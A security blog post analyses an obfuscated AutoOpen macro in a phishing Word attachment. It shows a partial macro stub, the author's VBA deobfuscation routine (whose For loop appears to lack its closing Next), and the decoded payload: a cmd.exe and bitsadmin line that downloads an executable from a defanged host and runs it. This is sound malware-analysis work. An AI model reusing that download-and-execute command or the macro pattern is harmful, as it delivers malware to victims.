Wednesday, June 7, 2017

De-obfuscating Macro from Phish Email

Saw this word doc in an email

Virus Total link

MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9

Email Subject: XXXX Credit Card Authorization Form

It contained macros that were obfuscated, partial example is below

Sub AutoOpen()
eculso = ""
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)


The string eculso clearly contained the malicious command to be run, so I removed the "run" commands in vb and created a de-obfuscate function reversing their vba code.

Public Function deobfuscate(obfuscated_command)
  pass1 = Join(Split(obfuscated_command, "."), "%%")
  still_obfuscated_command = Split(Trim(pass1), "%")
  resultstr = ""
  For counter = 0 To UBound(still_obfuscated_command)
   If Len(still_obfuscated_command(counter)) > 0 Then
    rotate_pass2 = CInt((still_obfuscated_command(counter))) + 10
    rotate_pass3 = Chr((rotate_pass2 + 2) + 2)
    converted_string = Array(resultstr, rotate_pass3)
    resultstr = Join(converted_string, "")
   End If
  deobfuscate = resultstr
End Function

Private Sub Document_Open()
  obfuscated_command = ""
  actual_command = deobfuscate(obfuscated_command)
  InputBox "malcode", "infosec", actual_command
End Sub

Which results in the malicious command printed to the a popup for me to view

cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"

More about neonprimetime

Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java

Top Github Contributions
  1. Qualys Scantronitor 2.0

Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.

No comments:

Post a Comment